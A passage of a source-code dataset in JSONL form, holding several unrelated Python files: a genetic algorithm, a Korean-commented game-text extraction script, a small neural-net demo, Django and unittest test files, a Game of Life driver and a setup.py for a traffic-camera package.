for _ in range(self.n)]\n\n def run(self, quiet: bool) -> float:\n for i in range(self.epochs):\n if not quiet:\n print(f'[i] Running epoch {i}')\n\n # Select new population\n row: List[Chromosome] = sorted(self.population, key=lambda x: x.objFunc())\n self.costHistory.append(row[0].objFunc())\n\n # Best one continues unmodified\n bestChrom = copy.deepcopy(row[0])\n\n xoverMask = []\n xovers = 0\n for _ in range(self.n - 1):\n if random.uniform(0, 1) > self.xoverChance:\n xoverMask.append(0)\n else:\n xoverMask.append(1)\n xovers += 1\n onlyMutate = self.n - 1 - xovers\n\n samples = onlyMutate + xovers * 2\n if self.selection == 'rand':\n chosenOnes = random.choices(row, k=samples)\n elif self.selection == 'exp':\n weights = [math.exp(-x) for x in range(self.n)]\n chosenOnes = random.choices(row, weights, k=samples)\n else:\n raise ValueError('Selection must be one of the following: rand, exp')\n\n children: List[Chromosome] = []\n\n # Crossover\n idx = 0\n for bit in xoverMask:\n if bit == 0:\n children.append(chosenOnes[idx])\n idx += 1\n continue\n\n child = Chromosome.reproduce(chosenOnes[idx], chosenOnes[idx + 1], self.xoverMode)\n children.append(child)\n idx += 2\n\n # Mutation\n for child in children:\n child.mutate(self.mutationFactor)\n\n # Succession\n if self.succession == 'best':\n combined: list[Chromosome] = row[1:] + children\n combined = sorted(combined, key=lambda x: x.objFunc())\n\n self.population = [bestChrom] + combined[:self.n - 1]\n elif self.succession == 'tourney':\n self.population = [bestChrom]\n\n for idx in range(self.n - 1):\n if row[idx + 1].objFunc() <= children[idx].objFunc():\n self.population.append(row[idx + 1])\n else:\n self.population.append(children[idx])\n else:\n raise ValueError('Invalid succession mode, expected: best or tourney')\n\n assert (len(self.population) == self.n)\n\n # Check how we're doing\n same = self.lenOfSame(i, self.costHistory[-1])\n self.changesHistory.append(same)\n\n # Sort final population\n self.population = sorted(self.population, key=lambda x: x.objFunc())\n return self.population[0].objFunc()\n\n def lenOfSame(self, epoch: int, score: float) -> int:\n \"\"\"\n Returns number of epochs that resulted in the same score\n \"\"\"\n if self.lastSameVal != score:\n self.lastSameVal = score\n self.lastSamePos = epoch\n return epoch - self.lastSamePos\n\n def result(self, visualizer: NetworkVisualizer) -> None:\n \"\"\"\n Output a lot of useful information to .csv files\n Also, take care of drawing mathplotlib graphs\n :param visualizer: reference to NetworkVisualizer class\n :return: None\n \"\"\"\n visualizer.drawNetworkModel(self.network, self.population[0])\n visualizer.drawObjFuncGraph(self.costHistory)\n visualizer.drawChangesHistory(self.changesHistory)\n\n visualizer.outputCSV('cost_history.csv',\n ['Epoch', 'Value'],\n [[i, val] for i, val in enumerate(self.costHistory)]\n )\n\n bestResult = self.population[0]\n linksNames = [link for link in self.network.links]\n modules = bestResult.modulesPerLink()\n visualizer.outputCSV('modules_per_link.csv',\n ['Link name', 'Modules installed'],\n [[name, modules[name]] for name in linksNames]\n )\n\n demandsNames = [demand for demand in self.network.demands]\n visualizer.outputCSV('path_choices.csv',\n ['Demand name'] + [f'Path_{i}' for i in range(10)],\n [\n [name] +\n [str(ch) for ch in bestResult.genes[name].path_choices]\n for name in demandsNames\n ])\n\n perLinkDemand = bestResult.modulesPerLink()\n visualizer.outputCSV('modules_per_link_per_demand.csv',\n ['Demand name'] + [name for name in linksNames],\n [\n [name] +\n [str(perLinkDemand[linkName]) for linkName in linksNames]\n for name in demandsNames\n ])\n\n demandsDiff = bestResult.calcDemands()\n visualizer.outputCSV('demand_diff_per_link.csv',\n ['Link name', 'Demand diff'],\n [[name, demandsDiff[name]] for name in linksNames]\n )\n\n if self.singleMode:\n paths: Dict[str, List[str]] = {}\n for name in demandsNames:\n pathNo = bestResult.genes[name].path_choices.index(1)\n paths[name] = [link.name for link in self.network.getDemand(name).paths[pathNo]]\n\n visualizer.outputCSV('links_per_demand.csv',\n ['Demand name'] + [f'Link_{i}' for i in range(8)],\n [[name] + paths[name] for name in demandsNames]\n )\n else:\n visualizer.outputCSV('link_per_demand.csv',\n ['Demand name', '0'], [['Not applicable...', '0']])\n\n bestResult.saveToXML(os.path.join(visualizer.outputDir, 'solution.xml'))\n\n visualizer.outputCSV('summary.csv',\n ['Parameter', 'Value'],\n [\n ['Epochs count', self.epochs],\n ['Population size', self.n],\n ['Mutation factor', self.mutationFactor],\n ['Single mode', self.singleMode],\n ['Modularity factor', self.modularity],\n ['Network size (nodes)', len(self.network.nodes)],\n ['Network size (links)', len(self.network.links)],\n ['Network size (demands)', len(self.network.demands)],\n ['Best score', bestResult.objFunc()],\n ['Total modules used', sum(bestResult.modulesPerLink().values())]\n ]\n )\n","sub_path":"src/GeneticAlgorithm.py","file_name":"GeneticAlgorithm.py","file_ext":"py","file_size_in_byte":8180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"532297877","text":"# -*- coding:utf-8 -*-\n\"\"\"\n-------------------룬팩 2,3,4 데이터 구조\n맨 처음에 헤더가 남습니다. 리틀엔디안 방식으로 4바이트로 끊어서\n[매직스탬프 TEXT] [총 대사 갯수] [대사길이] [대사 시작오프셋]\n[대사길이] [대사 시작오프셋][대사길이] [대사 시작오프셋]\n[대사길이] [대사 시작오프셋][대사길이] [대사 시작오프셋]\n[대사길이] [대사 시작오프셋][대사길이] [대사 시작오프셋]\n...\n반복입니다.\n\n-------------------프로그램 구조\n맨 처음 포인터를 찾고(foundoffset) 대사를 찾은후 포인터를 찾고(nextoffset) 이를 txt에 기록합니다.\n유니코드일경우 TBL을 탐색하여 그 TBL에 해당하는 글자가 있으면 그 TBL로 추출하고 없을경우 오류메세지를 띄우는 기능입니다\n\n-------------------상대 오프셋 디버깅에 관하여(DEBUG_RELATIVE_OFFSET)\n룬팩 파일 내에는 대사의 길이가 내장되있습니다. 디버깅 모드를 켜면 그것을 이용해 WQSG 스크립트의 대사를 측정하며\n끌 경우에는 이 프로그램 내에서 일일히 하나하나 셉니다\n자세한 것은 아래 주석을 참고하세요.\n★★★★★ 현재는 사용 불가능합니다 사용할 필요성을 못느꼈습니다.\n\n\n-------------------상대 어드레스 디버깅에 관하여(DEBUG_RELATIVE_ADDRESS)\n룬팩 파일 내에는 대사의 길이가 내장되있습니다. 디버깅 모드를 켜면 그것을 이용해 WQSG 스크립트의 대사를 측정하며\n끌 경우에는 이 프로그램 내에서 일일히 하나하나 셉니다\n자세한 것은 아래 주석을 참고하세요.\n★★★★ 어드레스 디버깅을 사용하면 강제로 오프셋 디버깅 또한 사용하게 됩니다.\n\ninFp3 = 포인터 쪽을 읽어드리는 부분입니다.\ninFp2 = 총 대사를 읽어드리는 부분입니다\n\"\"\"\n\"\"\"\n주의!!!\n추출했을때 \\n 은 줄띄는 \"새줄 문자\"라는 것으로 제어코드로 \"0A\" 입니다\n삽입시 이를 replace 해야될겁니다.\n\"\"\"\nglobal readfile\nglobal writefile\nglobal tablefile\nglobal inFp3\n\nimport time\nimport sys\n\n\ndef foundoffset(inFp):\n inFp = open(readfile, \"rb\")\n inFp.read(0xC)\n result=little_end_to_big_end(inFp)\n inFp.close()\n return int(result,16)\ndef little_end_to_big_end(inFpset):\n blank=[]\n for i in range(1,5):\n startpath=inFpset.read(1)\n temp=hex(ord(startpath))\n if(temp==\"0x0\"):\n temp=\"0x00\"\n if(temp==\"0x1\"):\n temp=\"0x01\"\n if(temp==\"0x2\"):\n temp=\"0x02\"\n if(temp==\"0x3\"):\n temp=\"0x03\"\n if(temp==\"0x4\"):\n temp=\"0x04\"\n if(temp==\"0x5\"):\n temp=\"0x05\"\n if(temp==\"0x6\"):\n temp=\"0x06\"\n if(temp==\"0x7\"):\n temp=\"0x07\"\n if(temp==\"0x8\"):\n temp=\"0x08\"\n if(temp==\"0x9\"):\n temp=\"0x09\"\n if(temp==\"0xa\"):\n temp=\"0x0A\"\n if(temp==\"0xb\"):\n temp=\"0x0B\"\n if(temp==\"0xc\"):\n temp=\"0x0C\"\n if(temp==\"0xd\"):\n temp=\"0x0D\"\n if(temp==\"0xe\"):\n temp=\"0x0E\"\n if(temp==\"0xf\"):\n temp=\"0x0F\"\n blank.append(temp) #각각 읽어 blank에 추가\n\n blank.reverse() #리틀엔디안->빅엔디안\n pointer=\"\"\n pointer += blank[0]\n pointer += blank[1]\n pointer += blank[2]\n pointer += blank[3]\n pointer=pointer.replace(\"0x\",\"\")\n result=\"\"\n result+=pointer\n result=result.upper()\n return result\ndef nextoffset(nextoffset):\n inFp3.read(nextoffset)\n result = little_end_to_big_end(inFp3)\n return result\ndef tableread():\n global TBLword\n global TBLhex\n inFp4=open(tablefile,\"r\",encoding='utf-8')\n while True:\n line=inFp4.readline()\n line=line.replace(\"\\n\",\"\")\n line=line.split(\"=\")\n if (line == ['']):\n break\n line[0] = line[0].replace(u\"\\ufeff\", '') #BOM고유오류 조정\n TBLword.append(line[1])\n TBLhex.append(line[0])\n print(TBLword)\n print(TBLhex)\n return\n\nreadfile=sys.argv[1]\ntry:\n writefile = sys.argv[2]\nexcept IndexError:\n writefile=readfile\n writefile+=\".txt\"\ntablefile=\"수정UTF_일어_대사추출.tbl\"\n#tablefile=sys.argv[3]\ninFp=0\ntexts=[]\n\n\nDEBUG_RELATIVE_OFFSET=1 #---------------------디버그 이용\nDEBUG_RELATIVE_ADDRESS=1 #---------------------디버그 이용\n\n\"\"\"\n상대 어드레스 디버그 이용\n0 -> 직접 주소값을 세 WQSG의 어드레스에 입력합니다\n1 -> 롬파일에 기록된 어드레스를 읽어내 WQSG의 길이에 입력합니다\n\n\n사용처\n대사를 삽입했을때 길이와 글자수가 일치하는지 검사하기위해 사용할 예정입니다.\n\"\"\"\n\n\"\"\"\n상대 오프셋 디버그 이용\n0 -> 직접 글자수를 세 WQSG의 길이에 입력합니다\n1 -> 롬파일에 기록된 글자수를 세 WQSG의 길이에 입력합니다\n\n\n사용처\n대사를 삽입했을때 길이와 글자수가 일치하는지 검사하기위해 사용할 예정입니다.\n\"\"\"\nif (DEBUG_RELATIVE_OFFSET == 0): # ------------------디버그가 1일 경우 shortoffset 대신 롬파일에서 읽어옵니다!\n print(\"YOU ARE IN DEBUG_RELATIVE_OFFSET MODE! READ LENGTH FROM ROM\")\n time.sleep(1)\nif (DEBUG_RELATIVE_ADDRESS == 1): # ------------------디버그가 1일 경우 shortoffset 대신 롬파일에서 읽어옵니다!\n print(\"YOU ARE IN DEBUG_RELATIVE_ADRESS MODE! READ LENGTH AND ADREES FROM ROM\")\n time.sleep(1)\n#------------------init-----------------------------\nlongoffset=0 #시작부터 끝까지 0으로 초기화가 안됨 - 시작되는 어드레스를 뜻합니다\nshortoffset=0 #한번 찾으면 바로 초기화 - 총 길이를 뜻합니다\nlengthoffset=0\nTBLword = [] #테이블 파일중 단어\nTBLhex = [] #테이블 파일중 16진수값\n#---------------------------------------------------\n\n\nstartoffset=foundoffset(inFp) #오프셋찾기(0x0c)\ntableread() #테이블파일읽기\ninFp=open(readfile,\"rb\")\noutFp=open(writefile,\"w\",encoding='utf-8')\ninFp3 = open(readfile, \"rb\")\n\ninFp3.read(0xC)\n\n\ns = inFp.read(startoffset)\nif (DEBUG_RELATIVE_OFFSET == 1) or (DEBUG_RELATIVE_ADDRESS==1):\n inFp3.close()\n inFp3 = open(readfile, \"rb\")\n inFp3.read(0x8)\n\nlenscrpit=0\n\nif (DEBUG_RELATIVE_ADDRESS == 1): # 롬 안의 메모리를 읽어오는경우\n inFp3.close()\n inFp3 = open(readfile, \"rb\")\n inFp3.read(0x4)\n looptime = int(little_end_to_big_end(inFp3), 16) # 총 대사길이를 알아냅니다\n inFp.close()\n beforeaddress = 0\n for kig in range(0, looptime):\n inFp = open(readfile, \"rb\")\n length = int(little_end_to_big_end(inFp3), 16) # 롬의 길이를 읽어냅니다\n address = int(little_end_to_big_end(inFp3), 16) # 롬의 주소값을 알아냅니다\n inFp.read(address) # 열었다 닫았따 하기때문에 바로 주소에서 읽어내도 상관이 없습니다\n result = inFp.read(length)\n result = str(result)\n result = result[2:-1]\n foundregester = 0\n lenresult = result\n result = result.replace(\"\\\\'\", \"'\")\n for i in range(0, len(lenresult)): # 대사에서 TBL에 있는 것들을 검색해야합니다.\n # i +=(foundregester)\n try:\n\n if ((result[i]) == ('\\\\') and not result[i:i + 2] == ('\\\\n') and not result[i:i + 2] == (\n \"\\\\\\\\\")): # 검색한것이 줄띄어쓰기가 아니고 ASCII코드에 없는경우\n if not (result[i:i + 4] == str('\\\\x00')) and not (result[i:i + 4] == \"\\\\xc\") and not (\n result[i:i + 4] == str(b'\\xa0')): # 특수한 경우를 제외합니다\n\n # ------------------3바이트, 2바이트, 1바이트 차례를 읽어와 테이블과 대조해야합니다!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n check = 0\n\n for t in range(0, 3):\n tblresult = \"\" # tbl 찾는값\n tblresult = result[i:i + (12 - 4 * t)] # 3바이트 2바이트 1바이트 차례로 읽어옴 읽어오기\n tblresult = tblresult.replace(\"'\", \"\")\n tblresult = tblresult.replace(\"x\", \"\")\n # print(\"tblresult\")\n # print(tblresult)\n # if(tblresult in \"\\\\\\\\\"): #만~~~약에 찾으려 했던 값이 \\였으면\n # print(\"HIHIHIHIHI\")\n # tblresult.replace('\\\\\\\\','\\\\')\n # foundregister+=1\n # check=1\n # time.sleep(10)\n # break\n #\n tblresult = tblresult.replace(\"\\\\\", \"\")\n tblresult = tblresult.upper() # 테��블 파일을 읽기위해 3바이트 HEX로 치환\n\n for k in range(0, len(TBLhex)): # 3바이트 HEX가 테이블파일에 있는지 검사\n if (tblresult == str(TBLhex[k])):\n tblresult = str(TBLword[k])\n # foundregester += int(len(TBLhex)/2) #찾은만큼 오프셋이 옆으로 이동해야하므로 추가합니다\n check = 1\n break\n if (check == 1):\n break\n\n if (check == 0):\n talk = \"TBL FILE CANNOT FOUND HEX CODES IN SCRPIT! HEX CODE ->\"\n talk += tblresult\n print(talk)\n print(\"10초 후 계속됩니다.\")\n time.sleep(10)\n\n temp0 = result[0:i] # 문자열을 두 부분으로 나눈다음 가운데를 방금 찾은 테이블표 값을 입력한후 다시 합칩니다.\n temp1 = result[i + 12 - 4 * t:len(result)]\n result = \"\"\n result += temp0\n result += tblresult\n result += temp1\n\n # print(result)\n else:\n length += 1\n\n except:\n break\n print(result)\n address = str(hex(address))\n address = address.replace(\"x\", \"\")\n address = address.upper()\n if (len(address) == 1):\n address = \"0000000\" + address\n if (len(address) == 2):\n address = \"000000\" + address\n if (len(address) == 3):\n address = \"00000\" + address\n if (len(address) == 4):\n address = \"0000\" + address\n if (len(address) == 5):\n address = \"000\" + address\n if (len(address) == 6):\n address = \"00\" + address\n if (len(address) == 7):\n address = \"0\" + address\n if ('\\\\\\\\') in result:\n result = result.replace(\"\\\\\\\\\", \"\\\\\") # \\\\이 써진걸 \\로 바꿉니다\n # outFp.write(str(address)) # 시작오프셋\n # outFp.write(\",\")\n # outFp.write(str(length)) # 길이\n # outFp.write(\",\")\n outFp.write(str(result))\n outFp.write(\"\\n\")\n length += 1\n inFp.close()\n lenscrpit += 1\nif(DEBUG_RELATIVE_ADDRESS==0):\n while True:\n s = inFp.read(1) #한칸한칸 읽어 대사의 마지막까지 검사합니다.\n if (len(s)==0):\n break\n if s == '':\n break\n if(ord(s)==00): #마지막일경우\n result=\"\"\n if(lenscrpit==0):\n if(DEBUG_RELATIVE_OFFSET==0):\n resultoffset = nextoffset(0)\n else: # ------------------디버그가 1일 경우 shortoffset 대신 롬파일에서 읽어옵니다!------------shortoffset 올라가는건 맨 아래에 있습니다.\n lengthoffset = int(little_end_to_big_end(inFp3),16) # 길이 = 롬에서 읽어옴\n resultoffset=nextoffset(0) #디버그가 1일경우 nextoffset을 4칸 건너뛴 곳에서 하지않고, 바로 읽어야합니다.\n else:\n if(DEBUG_RELATIVE_OFFSET==0):\n resultoffset=nextoffset(4)\n else: # ------------------디버그가 1일 경우 shortoffset 대신 롬파일에서 읽어옵니다!\n lengthoffset = int(little_end_to_big_end(inFp3),16) # 길이 = 롬에서 읽어옴\n resultoffset=nextoffset(0) #디버그가 1일경우 nextoffset을 4칸 건너뛴 곳에서 하지않고, 바로 읽어야합니다.\n\n lenscrpit += 1\n inFp2 = open(readfile, \"rb\")\n a=inFp2.read(startoffset) #처음 커서까지 이동\n if (longoffset != 0):\n a = inFp2.read(longoffset) # 방금까지의 오프셋으로 이동\n length=0\n tempoffset = shortoffset\n while True: # 총 대사길이 읽기\n if(length==tempoffset):\n break\n a = inFp2.read(1)\n a = str(a)\n\n if(len(a)==7) and not(a==str(b'\\x00')) and not(a==\"b'\\\\xc'\") and not(a==str(b'\\xa0')): #ASCII 코드에 없는경우\n tblresult=\"\" #tbl 찾는값\n tempoffset-=2 #2개를 더읽어오므로 미리추가\n b = inFp2.read(2)\n b = str(b)\n tblresult+=a[3:]\n tblresult+=b[3:]\n tblresult = tblresult.replace(\"'\", \"\")\n tblresult = tblresult.replace(\"x\", \"\")\n tblresult = tblresult.replace(\"\\\\\", \"\")\n tblresult=tblresult.upper() #테이블 파일을 읽기위해 3바이트 HEX로 치환\n check=0\n\n for i in range(0,len(TBLhex)): #3바이트 HEX가 테이블파일에 있는지 검사\n if(tblresult == str(TBLhex[i])):\n tblresult = str(TBLword[i])\n check=1\n break\n if(check==0):\n talk=\"TBL FILE CANNOT FOUND HEX CODES IN SCRPIT!\"\n talk+=tblresult\n\n print(talk)\n break\n result+=tblresult\n else:\n result+=a[2:-1]\n length += 1\n longoffset+=shortoffset+1 #방금까지 오프셋 추가\n a=str(a)\n if(DEBUG_RELATIVE_OFFSET == 1):\n shortoffset = lengthoffset\n print(result)\n outFp.write(resultoffset) #시작오프셋\n outFp.write(\",\")\n outFp.write(str(shortoffset)) #길이\n outFp.write(\",\")\n outFp.write(str(result))\n outFp.write(\"\\n\")\n a=inFp.read(1)\n shortoffset = 0 # 대사길이 초기화\n shortoffset+=1 #대사길이 추가\nprint(\"Done!\")\ninFp.close()\noutFp.close()\ninFp3.close()\n\n","sub_path":"Deprecated/RF WQSG Text Dump with TBL.py","file_name":"RF WQSG Text Dump with TBL.py","file_ext":"py","file_size_in_byte":15346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"496280723","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\nfrom HyperParameters import HyperParameters\nfrom DataReader import DataReader\nfrom NeuralNet import NeuralNet\n\nfile_name = \"./ch05.npz\"\n\ndef ShowResult(net,reader):\n X,Y = reader.GetWholeTrainSamples()\n fig = plt.figure()\n ax = Axes3D(fig)\n ax.scatter(X[:,0],X[:,1],Y)\n\n p = np.linspace(0,1)\n q = np.linspace(0,1)\n P,Q = np.meshgrid(p,q)\n R = np.hstack((P.ravel().reshape(2500,1),Q.ravel().reshape(2500,1)))\n Z = net.inference(R)\n Z = Z.reshape(50,50)\n ax.plot_surface(P,Q,Z,cmap='rainbow')\n plt.show()\n\nif __name__ == \"__main__\":\n reader = DataReader(file_name)\n reader.ReadData()\n reader.NormalizeX()\n reader.NormalizeY()\n\n hp = HyperParameters(2,1,eta=0.01,max_epoch=50,batch_size=10,eps = 1e-5)\n net = NeuralNet(hp)\n net.train(reader,checkpoint=0.1)\n print(\"W=\",net.weight)\n print(\"B=\",net.bias)\n\n x1 = 15\n x2 = 93\n x = np.array([x1,x2]).reshape(1,2)\n x_new = reader.NormalizePredicateData(x)\n z = net.inference(x_new)\n print(\"Z=\",z)\n Z_true = z*reader.Y_norm[0,1] + reader.Y_norm[0,0]\n print(\"Z_true=\",Z_true)\n ShowResult(net,reader)","sub_path":"NetCode/NeuralNet1.0/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"408321196","text":"# -*- coding: utf-8 -*-\nimport logging\nimport os\n\nfrom django.conf import settings\nfrom django.contrib.auth.models import Group, User\nfrom django.contrib.gis.geos import GEOSGeometry, Polygon\nfrom django.test import TestCase\nfrom django.db import DatabaseError\nfrom mock import patch, Mock, call, MagicMock\n\nfrom eventkit_cloud.jobs.models import Job, Region, ProviderTask, ExportProvider\n\nfrom celery.result import AsyncResult\nimport uuid\nfrom ..task_factory import TaskFactory, create_run\nfrom ..models import ExportRun\n\nlogger = logging.getLogger(__name__)\n\n\nclass TestExportTaskFactory(TestCase):\n \"\"\"\n Test cases for the TaskFactory.\n \"\"\"\n\n fixtures = ('insert_provider_types.json', 'osm_provider.json',)\n\n def setUp(self, ):\n self.path = os.path.dirname(os.path.realpath(__file__))\n Group.objects.create(name='TestDefaultExportExtentGroup')\n self.user = User.objects.create(username='demo', email='demo@demo.com', password='demo')\n bbox = Polygon.from_bbox((-10.85, 6.25, -10.62, 6.40))\n the_geom = GEOSGeometry(bbox, srid=4326)\n self.job = Job.objects.create(name='TestJob', description='Test description', user=self.user,\n the_geom=the_geom)\n provider = ExportProvider.objects.get(slug='osm')\n provider_task = ProviderTask.objects.create(provider=provider)\n self.job.provider_tasks.add(provider_task)\n self.region = Region.objects.get(name='Africa')\n self.job.region = self.region\n self.uid = str(provider_task.uid)\n self.job.save()\n\n def test_create_run_success(self):\n run_uid = create_run(job_uid=self.job.uid)\n self.assertIsNotNone(run_uid)\n self.assertIsNotNone(ExportRun.objects.get(uid=run_uid))\n\n @patch('eventkit_cloud.tasks.task_factory.ExportRun')\n def test_create_run_failure(self, ExportRun):\n ExportRun.objects.create.side_effect = DatabaseError('FAIL')\n with self.assertRaises(DatabaseError):\n run_uid = create_run(job_uid=self.job.uid)\n self.assertIsNone(run_uid)\n\n @patch('eventkit_cloud.tasks.task_factory.finalize_export_provider_task')\n @patch('eventkit_cloud.tasks.task_factory.create_task')\n @patch('eventkit_cloud.tasks.task_factory.chain')\n def test_task_factory(self, task_factory_chain, create_task, finalize_task):\n run_uid = create_run(job_uid=self.job.uid)\n self.assertIsNotNone(run_uid)\n self.assertIsNotNone(ExportRun.objects.get(uid=run_uid))\n worker = \"some_worker\"\n provider_uuid = uuid.uuid4()\n task_runner = MagicMock()\n task = Mock()\n task_runner().run_task.return_value = (provider_uuid, task)\n create_task.return_value = task\n task_factory = TaskFactory()\n task_factory.type_task_map = {'osm-generic': task_runner, 'osm': task_runner}\n task_factory.parse_tasks(run_uid=run_uid, worker=worker)\n task_factory_chain.assert_called()\n create_task.assert_called()\n finalize_task.s.assert_called()\n","sub_path":"eventkit_cloud/tasks/tests/test_task_factory.py","file_name":"test_task_factory.py","file_ext":"py","file_size_in_byte":3064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"462972909","text":"#---------------------------------------------------------------------------\n#importing the packages containing neccesaary functions and initializers\nfrom GameOfLife import *\nfrom GameParameters import *\n\n#declaring two empty lists for further use\nthisGen = []\nnextGen = []\n\n#calling the initGrid function to intialise the thisGen list\ninitGrid(ROWS, COLS, thisGen)\n\n#using deepcopy function to create a copy of thisGen list into nextGen for performing changes without affecting the original list i.e. thisGen\nnextGen = copy.deepcopy(thisGen)\n\n#calling the printGen function to print the board for the actions\nprintGen(ROWS, COLS, thisGen, 0)\n\n#looping through generations \nfor gens in range(1, GENERATIONS+1):\n input(\"1Press ENTER to see next generation\")\n #calling processNextGen function for processing the next generation \n processNextGen(ROWS, COLS, thisGen, nextGen)\n printGen(ROWS, COLS, nextGen, gens)\n thisGen = copy.deepcopy(nextGen)\ninput(\"Finished. Press ENTER to quit.\")\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"305479578","text":"from distutils.core import setup\nimport setuptools\n\nshort_description = \"Create, visualise and leverage networks of ANPR cameras on the road network.\"\n\nlong_description = \\\n\"\"\"\n**ANPRx** is a package for traffic analytics using networks of automatic number plate cameras.\n\"\"\"\n\nclassifiers = ['Development Status :: 3 - Alpha',\n 'License :: OSI Approved :: Apache Software License',\n 'Operating System :: OS Independent',\n 'Intended Audience :: Science/Research',\n 'Topic :: Scientific/Engineering :: GIS',\n 'Topic :: Scientific/Engineering :: Visualization',\n 'Topic :: Scientific/Engineering :: Physics',\n 'Topic :: Scientific/Engineering :: Mathematics',\n 'Topic :: Scientific/Engineering :: Information Analysis',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 3.6']\n\nwith open('requirements.txt') as f:\n requirements_lines = f.readlines()\ninstall_requires = [r.strip() for r in requirements_lines]\n\n# now call setup\nsetup(name = 'anprx',\n version = '0.1.1',\n description = short_description,\n long_description = long_description,\n classifiers = classifiers,\n url = 'https://github.com/pedroswits/anprx',\n author = 'Pedro Pinto da Silva',\n author_email = 'ppintodasilva@gmail.com',\n license = 'Apache License 2.0',\n platforms = 'any',\n packages = ['anprx'],\n install_requires = install_requires,\n extras_require = {\n 'tests': [\n 'tox >= 3.2.1',\n 'pytest >= 3.8.2'],\n 'docs': [\n 'sphinx >= 1.4',\n 'sphinx_rtd_theme'],\n 'examples': [\n 'ipykernel']})\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"268443301","text":"\"\"\" Test fit functions\n\"\"\"\n\nimport dismod_mr\n\ndef test_fit_asr():\n dm = dismod_mr.data.ModelData()\n dm.vars = dismod_mr.model.process.age_specific_rate(dm, 'p')\n \n dismod_mr.fit.asr(dm, 'p', iter=10, burn=5, thin=1)\n\ndef test_fit_consistent():\n dm = dismod_mr.data.ModelData()\n dm.vars = dismod_mr.model.process.consistent(dm)\n \n dismod_mr.fit.consistent(dm, iter=10, burn=5, thin=1)\n\nif __name__ == '__main__':\n import nose\n nose.runmodule()\n \n","sub_path":"tests/test_fit.py","file_name":"test_fit.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"438316172","text":"\nimport codecs\nimport project9_util as util\n\ndef fd():\n\n fdhis = \"fudan_history.txt\"\n enc = util.detect_encoding(fdhis)\n with codecs.open(fdhis,encoding=enc) as file:\n lines = file.readlines()\n\n newfile = util.nl_filename(fdhis)\n\n row_count = 1\n with codecs.open(newfile,\"w\",encoding=enc) as newfile2:\n for line in lines:\n if not line.split():\n newfile2.write(' '*5+line)\n continue\n newfile2.write(\"%-5d\"%row_count+line)\n row_count += 1\n\nif __name__ == '__main__':\n fd()\n\n \n","sub_path":"project9/project/16300120183.py","file_name":"16300120183.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"253615466","text":"from pprint import pprint\nimport unittest\n\nimport requests\n\nfrom application.views.vote import get_filtered_votes\nfrom application.views.vote import get_vote\nfrom application.views.vote import get_votes_by_person\nfrom application.views.vote import get_voting_record\n\n\nclass TestGetVote(unittest.TestCase):\n\t'''Test for the vote.get_vote() utility.'''\n\n\tdef test_get_vote(self):\n\t\t'''Test for vote.get_vote()'''\n\t\tvote = get_vote('118530')\n\t\tself.assertEqual(len(vote), 26)\n\t\tself.assertEqual(len(vote['related_bill']), 29)\n\t\texpected_title = ('H.R. 2578: Commerce, Justice, Science, and Related '\n\t\t\t'Agencies Appropriations Act, 2016')\n\t\tself.assertEqual(vote['related_bill']['title'], expected_title)\n\n\nclass TestGetFilteredVotes(unittest.TestCase):\n\n\tdef test_get_filtered_votes_all_votes(self):\n\t\tresponse = get_filtered_votes()\n\t\tvotes = response['objects']\n\t\tself.assertEqual(len(response), 2)\n\t\tself.assertEqual(len(votes), 100)\n\t\tself.assertTrue(104434 <= response['meta']['total_count'])\n\n\tdef test_get_filtered_votes_by_vote_id(self):\n\t\tvote_id = 118531\n\t\t# returns a single 'vote' object (no 'meta' of 'objects')\n\t\tvote = get_filtered_votes(vote_id=vote_id)\n\t\tself.assertEqual(len(vote), 26)\n\t\tself.assertEqual(vote['id'], vote_id)\n\t\tself.assertEqual(vote['congress'], 114)\n\n\tdef test_get_filtered_votes_by_bill_id(self):\n\t\tbill_id = 341624\n\t\tresponse = get_filtered_votes(bill_id=bill_id)\n\t\tvotes = response['objects']\n\t\tself.assertEqual(len(response), 2)\n\t\tself.assertTrue(21 <= response['meta']['total_count'])\n\t\tfor v in votes:\n\t\t\tself.assertEqual(v['related_bill']['id'], bill_id)\n\n\tdef test_get_filtered_votes_failure(self):\n\t\t'''Test that an exception is raised if too many args are passed.'''\n\t\tvote_id = 118531\n\t\tbill_id = 341624\n\t\traises = False\n\t\ttry:\n\t\t\tresponse = get_filtered_votes(vote_id=vote_id, bill_id=bill_id)\n\t\texcept:\n\t\t\traises = True\n\t\tself.assertEqual(raises, True)\n\n\nclass TestGetVotesByPerson(unittest.TestCase):\n\t'''Test the vote.get_votes_by_person() utility.'''\n\n\tdef test_get_votes_by_person(self):\n\t\t'''Test getting all votes by Bernie Sanders.'''\n\t\tn = 2\n\t\toffset = 100\n\t\tresponse = get_votes_by_person('400357', n=str(n), offset=str(offset))\n\t\tmeta = response['meta']\n\t\tvotes = response['objects']\n\t\tself.assertEqual(meta['limit'], n)\n\t\tself.assertEqual(meta['offset'], offset)\n\t\tself.assertTrue(12000 < meta['total_count'])\n\t\tself.assertEqual(len(votes), n)\n\t\tself.assertEqual(votes[0]['person']['firstname'], 'Bernard')\n\t\tself.assertEqual(len(votes[0]), 9)\n\t\tself.assertEqual(len(votes[0]['vote']), 25)\n\n\nclass TestGetVotingRecord(unittest.TestCase):\n\n\tdef test_get_voting_record_for_person(self):\n\t\trecord = get_voting_record(person_id='400357')\n\t\tself.assertEqual(len(record), 100)\n\n\tdef 